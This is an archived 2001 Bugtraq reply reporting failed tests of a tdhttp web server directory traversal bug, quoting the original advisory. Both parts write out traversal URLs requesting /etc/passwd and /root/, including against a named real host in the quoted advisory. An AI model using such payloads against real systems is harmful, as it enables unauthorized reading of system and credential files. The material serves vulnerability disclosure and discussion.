[19196] in bugtraq
Re: tdhttp transversal bug
daemon@ATHENA.MIT.EDU (sekure)
Tue Feb 13 19:17:45 2001
Mime-Version: 1.0
Content-Type: text/plain; charset="KOI8-R"
Content-Transfer-Encoding: 7bit
Message-Id: <002e01c095f2$c4640f50$6497a8c0@nt_hadrion.hadrion.com>
Date: Tue, 13 Feb 2001 16:25:32 -0300
Reply-To: sekure <sekure@hadrion.com.br>
From: sekure <sekure@HADRION.COM.BR>
X-To: UkR-XblP? <cuctema@OK.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
I done others tests...and didn't work here again in my 3 Server
linux...look:
http://192.168.151.100/../../../../../../../../../../etc/passwd
http://192.168.151.150/../../../../../../../../../../etc/passwd
http://192.168.151.1/../../../../../../../../../../etc/passwd
All return me this message:
Bad Request
Your browser sent a request that this server could not understand.
Invalid URI in request GET /../../../../../../../../../../etc/passwd
HTTP/1.1
Thakz
[ ]'s
-----Mensagem original-----
De: UkR-XblP? <cuctema@OK.RU>
Para: BUGTRAQ@SECURITYFOCUS.COM <BUGTRAQ@SECURITYFOCUS.COM>
Data: Segunda-feira, 12 de Fevereiro de 2001 21:17
Assunto: tdhttp transversal bug
>-=-=-=-=-=[ UkR security team - advisory n0. 7 ]=-=-=-=-=-
>tdhttp transversal bug
>-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>Date: 07.02.2001
>
>Problem: possibility of arbitrary file retreival
>and directory listing on remote host, running
>tdhttp (http.c, probably all its versions).
>
>Workaround: try another http daemon (Apache, for ex.) and
>disable http service 'till that time.
>
>Comment: duh. I wonder if I can see /etc/passwd right in my
>IE
>window. No matter it's only beta version, I mean http.c.
>After all, this bug is well-known.
>
>Authors: XblP, S1LENCE
>
>Example:
>http://www.timduff.com/../../../../../../../../../../etc/passwd
>http://www.timduff.com/../../../../../../../../../../root/
>Get your free e-mail address at http://www.zmail.ru
>
